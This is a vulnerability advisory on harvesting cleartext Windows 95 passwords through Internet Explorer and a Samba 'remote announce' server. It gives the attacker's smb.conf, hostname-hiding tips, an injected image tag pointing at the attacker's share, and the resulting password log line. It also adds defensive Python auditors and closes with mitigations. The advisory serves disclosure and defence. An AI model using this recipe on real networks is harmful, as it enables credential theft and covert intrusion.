COMMAND
Internet Explorer
SYSTEMS AFFECTED
Win '95
PROBLEM
There is a new security hole exploitable through MSIE. Details at:
http://www.security.org.il/msnetbreak/
It is possible from anywhere on the Internet to obtain the
cleartext Windows 95 login password from a Windows 95 computer on
a network connected directly to the Internet, given only its IP
address and workgroup, and to leave no trace of your actions. It
is untested against Windows for Workgroups but may work there as
well.
There has been recent discussion on security mailing lists about
the fact that Microsoft Internet Explorer running on Windows NT
will automatically try to log in to a remote SMB server (file
server) without prompting the user and without the user's
knowledge. By design, the NT machine transmits the user's username
and the password in encrypted (challenge/response) form to that
server. This is documented by Aaron Spangler. The caveats are that
the password is not sent in the clear and that in many cases
people do not browse the web from NT machines but from computers
running Windows 95.
It has been explained that this same exploit does not work against
Windows 95, because Windows 95 can only access SMB shares (file
sharing) that are:
* On the same subnet
* Listed in the Windows 95 computer's LMHOSTS file at startup
* Announced to the Windows 95 computer by a Master Browser
It is this third condition that can be taken advantage of to
obtain the cleartext password and username of any Windows 95 user
who runs Microsoft Internet Explorer. Even careless use of
Network Neighborhood can trigger the hole without Internet
Explorer being involved. The requirements are knowledge of the
user's IP address and workgroup name, and that the user visits a
hostile web page. The first two are not difficult to obtain, and
the third need not be an obscure page: in the last six months
sites such as the CIA's have been broken into, and all it would
take is one inconspicuous line added to the home page. Since the
visible content of the page is unchanged, such a change can go
unnoticed for a long time.
The exploit uses the Unix SMB implementation Samba. No source
changes are required, but Samba must be compiled with
-DDEBUG_PASSWORD so that it logs the passwords it checks. Samba
has an option in smb.conf called remote announce, which lets you
name a network address (host or broadcast) and a workgroup to
announce your existence to. I configured the [global] section of
smb.conf like this:
[global]
workgroup = EXPLOIT
preferred master = yes
domain master = yes
security = user
debug level = 100
remote announce = 10.0.0.255/WORKGROUP
The only line that must be changed is remote announce; the rest
works as-is. Note that nothing here turns on encrypt passwords
(Samba's default at the time was no), so the server never offers
encrypted password negotiation and the Windows 95 client falls
back to sending its password in plaintext, which is what the
debug logging then captures. A simple share must then be set up,
such as:
[exploit]
path = /tmp
public = no
browsable = yes
Nothing needs to be in the directory as nobody will ever see it.
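As an added example (not from the advisory or from the Samba project), a small auditor for the settings above: it parses the attacker's [global] and [exploit] sections as given, flags the choices that make the password harvest work, and reports nothing for a constructed hardened counterpart of a legitimate file server. The hardened configuration and its workgroup, share and path names are assumptions; the one setting that matters in it is encrypt passwords = yes, which makes a Windows 95 client send a challenge/response hash instead of its plaintext password.

```python
"""Audit an smb.conf for the settings the advisory relies on.

Example code added to this page; it is not part of the advisory or of Samba.
Both configurations are constructed: EXPLOIT_CONF mirrors the attacker's
sections from the text, HARDENED_CONF is an assumed counterpart for a
legitimate file server.
"""
import configparser

EXPLOIT_CONF = """\
[global]
workgroup = EXPLOIT
preferred master = yes
domain master = yes
security = user
debug level = 100
remote announce = 10.0.0.255/WORKGROUP

[exploit]
path = /tmp
public = no
browsable = yes
"""

HARDENED_CONF = """\
[global]
workgroup = OFFICE
security = user
encrypt passwords = yes
debug level = 1

[docs]
path = /srv/docs
browseable = yes
"""


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {parameter: value}}.

    Samba ignores case and whitespace in parameter names ("Encrypt Passwords"
    is the same as "encryptpasswords"), so names are normalised the same way.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = lambda name: name.lower().replace(" ", "")
    cp.read_string(text)
    return {section: dict(cp[section]) for section in cp.sections()}


def samba_bool(value, default=False):
    """Interpret a Samba boolean (yes/no, true/false, 1/0)."""
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return a list of (code, explanation) findings for the [global] section."""
    g = parse_smb_conf(text).get("global", {})
    findings = []

    # Without 'encrypt passwords = yes' the server never negotiates
    # challenge/response, so a Windows 95 client sends its password in the
    # clear.  Samba's default for this parameter was 'no' at the time.
    if not samba_bool(g.get("encryptpasswords"), default=False):
        findings.append(("plaintext-passwords",
                         "encrypt passwords is not enabled; clients fall back to plaintext"))

    # Debug level 100 is what the advisory pairs with -DDEBUG_PASSWORD to get
    # the 'checking user=[...] pass=[...]' line into the log.
    level_str = g.get("debuglevel", g.get("loglevel", "0"))
    try:
        level = int(level_str.split()[0])
    except ValueError:
        level = 0
    if level >= 100:
        findings.append(("password-logging-level",
                         "debug level %d logs credential checks" % level))

    # 'remote announce' pushes this host into another subnet's browse list,
    # the step that makes \\host show up in Network Neighborhood.
    if "remoteannounce" in g:
        findings.append(("remote-announce",
                         "host announces itself to " + g["remoteannounce"]))

    # Forcing master browser status keeps the announcement in place.
    if samba_bool(g.get("preferredmaster")) or samba_bool(g.get("domainmaster")):
        findings.append(("browser-election",
                         "host forces itself to become master browser"))

    return findings


if __name__ == "__main__":
    for name, conf in (("exploit", EXPLOIT_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_smb_conf(conf))
```

Run against the attacker's configuration it reports all four findings; against the hardened one it reports none. The parameter-name normalisation matters: Samba accepts "Encrypt Passwords", "encryptpasswords" and "encrypt passwords" interchangeably, so a checker that compares raw keys would miss the setting.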
To make yourself harder to trace, change your hostname to
something that does not exist, but make sure to create an entry
for it in /etc/hosts. This keeps your host untraceable unless the
network you connect to monitors its traffic (the SMB connection
itself still comes from your real IP address).
Run smbd and nmbd (nmbd is the daemon that actually sends the
browse announcement). If you run them from inetd, the daemons must
at least be started once for the announcement to go out; browsing
your own host with smbclient is enough to cause this. The
announcement is sent regardless of why the daemon was started.
At this point, anyone on the target network who looks at their
Windows 95 Network Neighborhood will see the host "EXPLOIT". The
target is now open to your attack. While this step may seem
obscure and complicated, it is in fact very simple. I won't go
into details here, but the methods for obtaining the workgroup
name are easy to use and readily available, and finding a target
network that has not protected ports 137 and 139 is also not
hard. Once that is done, setting up everything described so far
takes very little time.
The final and easiest step is to include the following in any html
file a user on this network accesses:
<img src=file://\\exploit/exploit/t.gif>
You will now see in your Samba log a line such as this:
checking user=[user] pass=[INNOCENT]
The password of any Internet-connected user running Microsoft
Internet Explorer on Windows 95 can thus be obtained in cleartext,
provided that their network administrator has not protected them
from reaching external SMB servers by closing ports 137 and 139.
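A check for the injected line above, as added example code that is not part of the advisory: it parses a page's HTML and reports every resource attribute that would make a Windows client open an SMB connection, a UNC path or a file: URL naming a remote host, and distinguishes references the browser fetches on its own (img src, body background) from ones that need a click. The sample page, its host names and share names are constructed for the demonstration.

```python
r"""Report HTML resource references that make a Windows client open an SMB
connection: UNC paths (\\host\share) and file: URLs that name a remote host.

Example code added to this page, not part of the advisory.  SAMPLE_PAGE is a
constructed page; the host and share names in it are assumptions.
"""
import re
from html.parser import HTMLParser

# Attributes the browser fetches on its own, with no click required.
AUTO_FETCH_ATTRS = {"src", "lowsrc", "dynsrc", "background", "data"}
# Attributes that only fire when the user clicks; still worth reporting.
CLICK_ATTRS = {"href", "action"}

# file: scheme, then the run of forward slashes, then any backslashes, then
# the remainder (host and path).
_FILE_URL = re.compile(r"file:(?P<slashes>/*)(?P<backslashes>\\*)(?P<rest>.*)", re.I)


def is_smb_reference(url):
    r"""True for \\host\share, file://host/share, file://\\host\share and
    file:////host/share.  Local forms (file:///C:/x, file:///etc/x,
    file://localhost/x) return False."""
    s = url.strip()
    if s.startswith("\\\\"):
        return True
    m = _FILE_URL.match(s)
    if not m:
        return False
    slashes, backslashes, rest = m.group("slashes", "backslashes", "rest")
    # Exactly two slashes (or four, or a backslash form) means the next
    # component is a host name; three slashes means an empty host (local).
    if backslashes or len(slashes) == 2 or len(slashes) >= 4:
        host = re.split(r"[/\\]", rest, maxsplit=1)[0]
    else:
        host = ""
    if host == "" or host.lower() == "localhost":
        return False
    if re.fullmatch(r"[a-z][:|]", host, re.I):  # drive letter, e.g. file://C:/x
        return False
    return True


class SMBReferenceFinder(HTMLParser):
    """Collect every start tag whose fetchable attribute points at SMB."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names.
        for name, value in attrs:
            if value is None:
                continue
            if (name in AUTO_FETCH_ATTRS or name in CLICK_ATTRS) and is_smb_reference(value):
                self.hits.append({
                    "line": self.getpos()[0],
                    "tag": tag,
                    "attr": name,
                    "value": value,
                    "auto_fetch": name in AUTO_FETCH_ATTRS,
                })


def find_smb_references(html_text):
    """Return the list of SMB references found in html_text, in page order."""
    parser = SMBReferenceFinder()
    parser.feed(html_text)
    parser.close()
    return parser.hits


# Constructed sample page: one injected <img> like the advisory's, one UNC
# background, one local file: URL that must not be flagged.
SAMPLE_PAGE = """\
<html><head><title>Welcome</title></head>
<body background="\\\\srv01\\pub\\bg.gif">
<h1>Welcome to our site</h1>
<img src="/images/logo.gif" alt="logo">
<a href="http://www.example.com/news.html">News</a>
<img src=file://\\\\exploit/exploit/t.gif>
<img src="file:///C:/temp/local.gif">
</body></html>
"""

if __name__ == "__main__":
    for hit in find_smb_references(SAMPLE_PAGE):
        kind = "auto-fetched" if hit["auto_fetch"] else "on click"
        print("line %d: <%s %s=%s> (%s)" % (hit["line"], hit["tag"], hit["attr"], hit["value"], kind))
```

The distinction between file:// with a host and file:/// with an empty host is the whole check: a URL such as file:///C:/temp/local.gif stays on the local machine, whereas file://\\exploit/... or \\srv01\pub\... makes the client contact the named host over SMB, and IE sends the user's credentials along with that connection.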
If the password you obtained belongs to a user of a Windows NT
server, you can take the username, password and workgroup and log
into that server. Your true hostname and IP address are not stored
in the html file, and I am aware of no logging of hosts that enter
the browse list, so you are hard to trace even though the victim
connects directly to your machine. If you are lucky, you have
found the Windows 95 machine of the NT administrator and have
little work left to access the NT server with administrator
privileges.
For a demonstration, see the original site (the URL above).
Discovery by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.
SOLUTION
Until Microsoft comes up with a fix, try one or more of the
following:
* Use Netscape instead of Internet Explorer.
* Use a proxy firewall or packet filter to block ports 137 and 139
(and 138, which carries the browse announcements), TCP and UDP,
from external access to your network; this still leaves you at
risk from internal attacks.
* Ask Microsoft to change Windows so that it does not send
passwords to arbitrary servers by default.